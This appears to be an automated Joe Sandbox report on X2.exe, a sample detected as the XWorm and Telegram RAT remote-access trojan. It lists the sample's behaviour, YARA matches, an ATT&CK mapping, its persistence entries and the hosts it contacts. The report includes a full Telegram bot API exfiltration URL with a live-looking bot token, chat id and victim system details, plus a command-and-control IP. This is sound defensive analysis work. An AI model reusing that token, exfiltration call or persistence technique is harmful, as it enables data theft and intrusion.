Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation

Source: C:\Users\user\Desktop\X2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: X2.exe, 00000003.00000002.2558218790.000000001BA3D000.00000004.00000020.00020000.00000000.sdmp, X2.exe, 00000003.00000002.2564437590.000000001C5CD000.00000004.00000020.00020000.00000000.sdmp, X2.exe, 00000003.00000002.2539747691.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, X2.exe, 00000003.00000002.2558218790.000000001BA74000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\X2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X2.exe PID: 1320, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X2.exe PID: 1320, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X2.exe PID: 1320, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: X2.exe, type: SAMPLE
Source: Yara match	File source: 3.0.X2.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1287230398.0000000000852000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X2.exe PID: 1320, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
X2.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.AsyncRAT
X2.exe	66%	Virustotal		Browse
X2.exe	100%	Avira	TR/Spy.Gen
X2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\explorer.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\explorer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\explorer.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\explorer.exe	66%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://crl.m3	0%	Avira URL Cloud	safe
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
91.92.252.220	0%	Avira URL Cloud	safe
https://api.telegrP	0%	Avira URL Cloud	safe
127.0.0.1	0%	Avira URL Cloud	safe
127.0.0.1	2%	Virustotal		Browse
http://www.microsoft.co	1%	Virustotal		Browse
91.92.252.220	12%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
91.92.252.220	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3	false		high
127.0.0.1	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	powershell.exe, 00000008.00000002.1520289753.0000016D30F66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1385650086.000001C310070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1501820454.0000016D287CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1679683114.00000196E9E1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.telegram.org/bot	X2.exe, explorer.exe.3.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1368428617.000001C30022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=96664	X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000008.00000002.1520289753.0000016D30FB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703721938.00000196F24EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2001436445.000001E8649BC000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 0000000B.00000002.1706316876.00000196F256C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1706316876.00000196F25E5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.m3	powershell.exe, 0000000D.00000002.2005047268.000001E864A81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1368428617.000001C30022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C579000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1385650086.000001C310070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1501820454.0000016D287CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1679683114.00000196E9E1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1952730875.000001E85C3BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegrP	X2.exe, 00000003.00000002.2546617770.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1368428617.000001C300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C351000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	X2.exe, 00000003.00000002.2546617770.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	X2.exe, 00000003.00000002.2546617770.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1368428617.000001C300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1421117542.0000016D18761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1558079051.00000196D9DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1756450379.000001E84C351000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
91.92.252.220	unknown	Bulgaria	34368	THEZONEBG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430688
Start date and time:	2024-04-24 02:52:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	X2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/21@2/4
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Successful, ratio: 79% Number of executed functions: 78 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target explorer.exe, PID 1088 because it is empty
Execution Graph export aborted for target explorer.exe, PID 2096 because it is empty
Execution Graph export aborted for target explorer.exe, PID 2884 because it is empty
Execution Graph export aborted for target explorer.exe, PID 4040 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2452 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3064 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3572 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7076 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:53:09	API Interceptor	60x Sleep call for process: powershell.exe modified
02:54:19	API Interceptor	295x Sleep call for process: X2.exe modified
02:54:20	Task Scheduler	Run new task: explorer path: C:\Users\user\AppData\Roaming\explorer.exe
02:54:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
02:54:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
02:54:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Comprobante.xlam.xlsx	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	gmb.xls	Get hash	malicious	Unknown	Browse
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	s.exe	Get hash	malicious	Unknown	Browse
	s.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
api.telegram.org	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	pdhmXuEYmc.exe	Get hash	malicious	RedLine	Browse	91.92.241.122
	Remittance slip.js	Get hash	malicious	VjW0rm	Browse	91.92.255.130
	PROFOMA INVOICE.js	Get hash	malicious	VjW0rm	Browse	91.92.255.61
	zirurEg4mX.elf	Get hash	malicious	Unknown	Browse	91.92.252.191
	qBSw7aeXEM.exe	Get hash	malicious	RedLine	Browse	91.92.250.88
	cXiIHv7tfd.exe	Get hash	malicious	Lokibot	Browse	91.92.253.228
	wQkjhw6VZ6.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
	MFj7OCV6NX.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
	YQKtul13uu.exe	Get hash	malicious	Lokibot	Browse	91.92.253.228
	hNqGyuEhv2.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
TELEGRAMRU	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Nekark.22288.17032.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrambot-fix.pages.dev/bot.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
